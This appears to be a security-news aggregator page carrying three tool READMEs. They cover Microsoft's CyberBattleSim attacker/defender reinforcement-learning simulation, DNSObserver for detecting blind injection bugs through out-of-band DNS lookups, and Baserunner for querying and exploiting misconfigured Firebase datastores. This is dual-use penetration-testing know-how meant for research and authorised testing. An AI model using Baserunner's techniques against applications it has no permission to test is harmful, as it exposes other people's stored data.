The simulation environment is parameterized by a fixed network topology and a set of vulnerabilities that agents can utilize to move laterally in the network. The goal of the attacker is to take ownership of a portion of the network by exploiting vulnerabilities that are planted in the computer nodes. While the attacker attempts to spread throughout the network, a defender agent watches the network activity and tries to detect any attack taking place and mitigate the impact on the system by evicting the attacker. We provide a basic stochastic defender that detects and mitigates ongoing attacks based on pre-defined probabilities of success. We implement mitigation by re-imaging the infected nodes, a process abstractly modeled as an operation spanning over multiple simulation steps.

To compare the performance of the agents we look at two metrics: the number of simulation steps taken to attain their goal and the cumulative rewards over simulation steps across training epochs.


Project goals

We view this project as an experimentation platform to conduct research on the interaction of automated agents in abstract simulated network environments. By open sourcing it we hope to encourage the research community to investigate how cyber-agents interact and evolve in such network environments.

The simulation we provide is admittedly simplistic, but this has advantages. Its highly abstract nature prohibits direct application to real-world systems thus providing a safeguard against potential nefarious use of automated agents trained with it. At the same time, its simplicity allows us to focus on specific security aspects we aim to study and quickly experiment with recent machine learning and AI algorithms.

For instance, the current implementation focuses on the lateral movement cyber-attacks techniques, with the hope of understanding how network topology and configuration affects them. With this goal in mind, we felt that modeling actual network traffic was not necessary. This is just one example of a significant limitation in our system that future contributions might want to address.

On the algorithmic side, we provide some basic agents as starting points, but we would be curious to find out how state-of-the art reinforcement learning algorithms compare to them. We found that the large action space intrinsic to any computer system is a particular challenge for Reinforcement Learning, in contrast to other applications such as video games or robot control. Training agents that can store and retrieve credentials is another challenge faced when applying RL techniques where agents typically do not feature internal memory. These are other areas of research where the simulation could be used for benchmarking purposes.

Other areas of interest include the responsible and ethical use of autonomous cyber-security systems: How to design an enterprise network that gives an intrinsic advantage to defender agents? How to conduct safe research aimed at defending enterprises against autonomous cyber-attacks while preventing nefarious use of such technology?


Documentation

Read the Quick introduction to the project.


Benchmark

See Benchmark.


Setting up a dev environment

It is strongly recommended to work under a Linux environment, either directly or via WSL on Windows. Running Python on Windows directly should work but is not supported anymore.

Start by checking out the repository:

git clone https://github.com/microsoft/CyberBattleSim.git

On Linux or WSL

The instructions were tested on a Linux Ubuntu distribution (both native and via WSL). Run the following command to set-up your dev environment and install all the required dependencies (apt and pip packages):

./init.sh

The script installs python3.8 if not present. If you are running a version of Ubuntu older than 20 it will automatically add an additional apt repository to install python3.8.

The script will create a virtual Python environment under a venv subdirectory, you can then run Python with venv/bin/python.

Note: If you prefer Python from a global installation instead of a virtual environment then you can skip the creation of the virtual envrionment by running the script with ./init.sh -n. This will instead install all the Python packages on a system-wide installation of Python 3.8.


Windows Subsystem for Linux

The supported dev environment on Windows is via WSL. You first need to install an Ubuntu WSL distribution on your Windows machine, and then proceed with the Linux instructions (next section).


Git authentication from WSL

To authenticate with Git you can either use SSH-based authentication, or alternatively use the credential-helper trick to automatically generate a PAT token. The latter can be done by running the following commmand under WSL (more info here):

git config --global credential.helper "/mnt/c/Program\ Files/Git/mingw64/libexec/git-core/git-credential-manager.exe"

Docker on WSL

To run your environment within a docker container, we recommend running docker via Windows Subsystem on Linux (WSL) using the following instructions: Installing Docker on Windows under WSL).


Windows (unsupported)

This method is not maintained anymore, please prefer instead running under a WSL subsystem Linux environment. But if you insist you want to start by installing Python 3.8 then in a Powershell prompt run the ./init.ps1 script.


Getting started quickly using Docker

The quickest method to get up and running is via the Docker container.

NOTE: For licensing reasons, we do not publicly redistribute any build artifact. In particular the docker registry spinshot.azurecr.io referred to in the commands below is kept private to the project maintainers only.

As a workaround, you can recreate the docker image yourself using the provided Dockerfile, publish the resulting image to your own docker registry and replace the registry name in the commands below.

commit=7c1f8c80bc53353937e3c69b0f5f799ebb2b03ee
docker login spinshot.azurecr.io
docker pull spinshot.azurecr.io/cyberbattle:$commit
docker run -it spinshot.azurecr.io/cyberbattle:$commit cyberbattle/agents/baseline/run.py

Check your environment

Run the following command to run a simulation with a baseline RL agent:

python cyberbattle/agents/baseline/run.py --training_episode_count 1 --eval_episode_count 1 --iteration_count 10 --rewardplot_with 80  --chain_size=20 --ownership_goal 1.0

If everything is setup correctly you should get an output that looks like this:

torch cuda available=True
###### DQL
Learning with: episode_count=1,iteration_count=10,ϵ=0.9,ϵ_min=0.1, ϵ_expdecay=5000,γ=0.015, lr=0.01, replaymemory=10000,
batch=512, target_update=10
## Episode: 1/1 'DQL' ϵ=0.9000, γ=0.015, lr=0.01, replaymemory=10000,
batch=512, target_update=10
Episode 1|Iteration 10|reward: 139.0|Elapsed Time: 0:00:00|###################################################################|
###### Random search
Learning with: episode_count=1,iteration_count=10,ϵ=1.0,ϵ_min=0.0,
## Episode: 1/1 'Random search' ϵ=1.0000,
Episode 1|Iteration 10|reward: 194.0|Elapsed Time: 0:00:00|###################################################################|
simulation ended
Episode duration -- DQN=Red, Random=Green
10.00 ┼
Cumulative rewards -- DQN=Red, Random=Green
194.00 ┼ ╭──╴
174.60 ┤ │
155.20 ┤╭─────╯
135.80 ┤│ ╭──╴
116.40 ┤│ │
97.00 ┤│ ╭╯
77.60 ┤│ │
58.20 ┤╯ ╭──╯
38.80 ┤ │
19.40 ┤ │
0.00 ┼──╯

Jupyter notebooks

To quickly get familiar with the project you can open one the the provided Juptyer notebooks to play interactively with the gym environments. Just start jupyter with jupyter notebook, or venv/bin/jupyter notebook if you are using a virtual environment setup.

The following .py notebooks are best viewed in VSCode or in Jupyter with the Jupytext extension and can easily be converted to .ipynb format if needed:


How to instantiate the Gym environments?

The following code shows how to create an instance of the the OpenAI Gym environment CyberBattleChain-v0, an environment based on a chain-like network structure, with 10 nodes (size=10) where the agent's goal is to either gain full ownership of the network (own_atleast_percent=1.0) or break the 80% network availability SLA (maintain_sla=0.80), while the netowrk is being monitored and protected by basic probalistically-modelled defender (defender_agent=ScanAndReimageCompromisedMachines):

import cyberbattle._env.cyberbattle_env

cyberbattlechain_defender =
gym.make('CyberBattleChain-v0',
size=10,
attacker_goal=AttackerGoal(
own_atleast=0,
own_atleast_percent=1.0
),
defender_constraint=DefenderConstraint(
maintain_sla=0.80
),
defender_agent=ScanAndReimageCompromisedMachines(
probability=0.6,
scan_capacity=2,
scan_frequency=5))

To try other network topologies, take example on chainpattern.py to define your own set of machines and vulnerabilities, then add an entry in the module initializer to declare and register the Gym environment.


Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.


Ideas for contributions

Here are some ideas on how to contribute: enhance the simulation (event-based, refined the simulation, …), train an RL algorithm on the existing simulation, implement benchmark to evaluate and compare novelty of agents, add more network generative modes to train RL-agent on, contribute to the doc, fix bugs.

See also the wiki for more ideas.


Citing this project
@misc{msft:cyberbattlesim,
Author = {Microsoft Defender Research Team.}
Note = {Created by Christian Seifert, Michael Betser, William Blum, James Bono, Kate Farris, Emily Goren, Justin Grana, Kristian Holsheimer, Brandon Marken, Joshua Neil, Nicole Nichols, Jugal Parikh, Haoran Wei.},
Publisher = {GitHub},
Howpublished = {\url{https://github.com/microsoft/cyberbattlesim}},
Title = {CyberBattleSim},
Year = {2021}
}

Note on privacy

This project does not include any customer data. The provided models and network topologies are purely fictitious. Users of the provided code provide all the input to the simulation and must have the necessary permissions to use any provided data.


Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



DNSObserver - A Handy DNS Service Written In Go To Aid In The Detection Of Several Types Of Blind Vulnerabilities

$
0
0


A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends notifications with the received request's details via Slack. DNSObserver can help you find bugs such as blind OS command injection, blind SQLi, blind XXE, and many more!


For a more detailed overview and setup instructions, see:

https://www.allysonomalley.com/2020/05/22/dnsobserver/


Setup

What you'll need:

  • Your own registered domain name
  • A Virtual Private Server (VPS) to run the script on (I'm using Ubuntu - I have not tested this tool on other systems)
  • [Optional] Your own Slack workspace and a webhook

Domain and DNS Configuration

If you don't already have a VPS ready to use, create a new Linux VPS with your preferred provider. Note down its public IP address.

Register a new domain name with your preferred registrar - any registrar should be fine as long as they allow setting custom name servers and glue records.

Go into your new domain's DNS settings and find the 'glue record' section. Add two entries here, one for each new name server, and supply both with the public IP address of your VPS.

Next, change the default name servers to:

ns1.<YOUR-DOMAIN>
ns2.<YOUR-DOMAIN>

Server Setup

SSH into your VPS, and perform these steps:

  • Install Go if you don't have it already. Installation instructions can be found here

  • Make sure that the default DNS ports are open - 53/UDP and 53/TCP. Run:

     sudo ufw allow 53/udp
    sudo ufw allow 53/tcp
  • Get DNSObserver and its dependencies:

     go get github.com/allyomalley/dnsobserver/...

DNSObserver Configuration

There are two required arguments, and two optional arguments:

domain[REQUIRED]
Your new domain name.

ip[REQUIRED]
Your VPS' public IP address.

webhook[Optional]
If you want to receive notifications, supply your Slack webhook URL. You'll be notified of any lookups of your domain name, or for any subdomains of your domain (I've excluded notifications for queries for any other apex domains and for your custom name servers to avoid excessive or random notifications). If you do not supply a webhook, interactions will be logged to standard output instead. Webhook setup instructions can be found here.

recordsFile[Optional]
By default, DNSObserver will only respond with an answer to queries for your domain name, or either of its name servers. For any other host, it will still notify you of the interaction (as long as it's your domain or a subdomain), but will send back an empty response. If you want DNSObserver to answer to A lookups for certain hosts with an address, you can either edit the config.yml file included in this project, or create your own based on this template:

a_records:
- hostname: ""
ip: ""
- hostname: ""
ip: ""

Currently, the tool only uses A records - in the future I may add in CNAME, AAAA, etc). Here is an example of a complete custom records file:

a_records:
- hostname: "google.com"
ip: "1.2.3.4"
- hostname: "github.com"
ip: "5.6.7.8"

These settings mean that I want to respond to queries for 'google.com' with '1.2.3.4', and queries for 'github.com' with '5.6.7.8'.


Usage

Now, we are ready to start listening! If you want to be able to do other work on your VPS while DNSObserver runs, start up a new tmux session first.

For the standard setup, pass in the required arguments and your webhook:

dnsobserver --domain example.com --ip 11.22.33.44 --webhook https://hooks.slack.com/services/XXX/XXX/XXX

To achieve the above, but also include some custom A lookup responses, add the argument for your records file:

dnsobserver --domain example.com --ip 11.22.33.44 --webhook https://hooks.slack.com/services/XXX/XXX/XXX --recordsFile my_records.yml

Assuming you've set everything up correctly, DNSObserver should now be running. To confirm it's working, open up a terminal on your desktop and perform a lookup of your new domain ('example.com' in this demo):

dig example.com

You should now receive a Slack notification with the details of the request!



Baserunner - A Tool For Exploring Firebase Datastores

$
0
0

A tool for exploring and exploitingFirebase datastores.


Set up
  1. git clone https://github.com/iosiro/baserunner.git
  2. cd baserunner
  3. npm install
  4. npm run build
  5. npm start
  6. Go to http://localhost:3000 in your browser.

Usage

The Baserunner interface looks like this:



First, use the configuration textbox to load a Firebase configuration JSON structure from the app you'd like to test. It looks like this:

{
"apiKey": "API_KEY",
"authDomain": "PROJECT_ID.firebaseapp.com",
"databaseURL": "https://PROJECT_ID.firebaseio.com",
"projectId": "PROJECT_ID",
"storageBucket": "PROJECT_ID.appspot.com",
"messagingSenderId": "SENDER_ID",
"appId": "APP_ID",
"measurementId": "G-MEASUREMENT_ID",
"databaseURL": "https://PROJECT_ID.firebasedatabase.app/"
}

Then log in as a regular user, either with email and password or with a mobile phone number. When logging in with a mobile phone number, complete the CAPTCHA before submitting your number. You then be prompted for an OTP from your SMS. Enter this without completing the CAPTCHA to finish logging in. Note that you can skip this step to test queries without authentication.

Finally, you can use the query interface to submit queries to the application's Cloud Firestore. Baserunner provides a number of template queries for common actions. Click on one of them to load it in the textbox, and replace the values that look ==LIKE THIS== with valid names of collections, IDs, fields, etc.

As there is no way of getting a list of available collection using the Firebase JavaScript SDK, you will need to guess these, or source their names from the application's front-end JavaScript.


FAQ

How do I tell if an app is using Cloud Firestore or Realtime Database?

Applications using Realtime Database will have a databaseURL key in their configuration objects. Applications without this key can be assumed to use Cloud Firestore. Note that it is possible for Firebase applications to use both datastores, so when in doubt, run both types of queries.

I'm getting blocked by CORS!

To function as intended, Baserunner expects applications to accept requests from localhost, which is enabled by default. Therefore, Baserunner cannot be used as a hosted application.

Should requests from localhost be disallowed by the application you're testing, a version of Baserunner with a reduced featureset can still be run by opening dist/index.html in your browser. Note that this way of running Baserunner only supports email + password login and not phone login.

How do I know what collections to query for?

Cloud Firestore: For security reasons, Firebase's client-side JavaScript API does not provide a mechanism for listing collections. You will need to deduce these from looking at the target application's JavaScript code and making educated guesses.

Realtime Database: As this datastore is represented as a JSON object, you can use the provided "[Realtime Database] Read datastore" query to attempt to view the entire thing. Note that this may fail depending on the rules configured.

Can I see the results of previous queries?

While only the latest query result is displayed on the Baserunner page, all results are logged to the browser console.

When running Realtime Database queries, I get an error that says the client is offline.

Try rerunning the query.



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>